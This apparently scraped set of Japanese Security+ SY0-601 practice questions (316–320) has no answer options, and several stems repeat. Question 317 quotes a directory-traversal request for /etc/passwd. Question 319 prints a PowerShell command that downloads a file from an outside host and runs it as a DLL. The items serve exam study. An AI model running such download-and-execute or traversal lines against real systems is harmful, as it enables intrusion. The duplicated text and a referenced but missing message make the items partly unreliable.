SY0-601 試験問題 316
法執行機関は、電子的に保存された情報と紙の文書は破棄できないという通知を企業に送りました。このプロセスを説明するのは次のどれですか。
SY0-601 試験問題 317
ジュニア セキュリティ アナリストが Web サーバー ログを確認し、ログ ファイルで次のパターンを特定しました。
http://comptia.org/../../../etc/passwd
次のどのタイプの攻撃が試みられていますか? また、それを軽減するにはどうすればよいでしょうか?
http://comptia.org/../../../etc/passwd
次のどのタイプの攻撃が試みられていますか? また、それを軽減するにはどうすればよいでしょうか?
SY0-601 試験問題 318
仮想環境の構築を計画する場合、管理者は次のことを達成する必要があります。
*新しいVMを作成できるユーザーを制限するポリシーを確立する
*実際の使用状況に応じてリソースを割り当てる
*標準要件外の要求には正当性が必要です。
* サイズとリソース要件に基づいて標準化されたカテゴリを作成します。管理者が最も実行しようとしているのは次のどれですか?
*新しいVMを作成できるユーザーを制限するポリシーを確立する
*実際の使用状況に応じてリソースを割り当てる
*標準要件外の要求には正当性が必要です。
* サイズとリソース要件に基づいて標準化されたカテゴリを作成します。管理者が最も実行しようとしているのは次のどれですか?
SY0-601 試験問題 319
従業員が、Updates.Lnk という通常とは異なるファイルが添付された電子メールを受信しました。セキュリティ アナリストがファイルのリバース エンジニアリングを行ったところ、次のスクリプトが実行されることが判明しました。
C:\Windows\System32\WindowsPowerShell\vl.0\powershell.exe -URI https://somehost.com/04EB18.jpg
-OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll アナリストが発見した内容を最もよく表しているのは次のどれですか?
C:\Windows\System32\WindowsPowerShell\vl.0\powershell.exe -URI https://somehost.com/04EB18.jpg
-OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll アナリストが発見した内容を最もよく表しているのは次のどれですか?
SY0-601 試験問題 320
ある研究者が過去10か月間、大規模なデータセットを分析してきました。研究者は他の機関の同僚と協力し、通常はSSH経由で接続して追加データを取得します。
a. これまで、この設定は問題なく機能していましたが、最近、研究者は次のメッセージを受け取るようになりました。
次のネットワーク攻撃のうち、研究者が最も遭遇する可能性が高いのはどれですか?
a. これまで、この設定は問題なく機能していましたが、最近、研究者は次のメッセージを受け取るようになりました。
次のネットワーク攻撃のうち、研究者が最も遭遇する可能性が高いのはどれですか?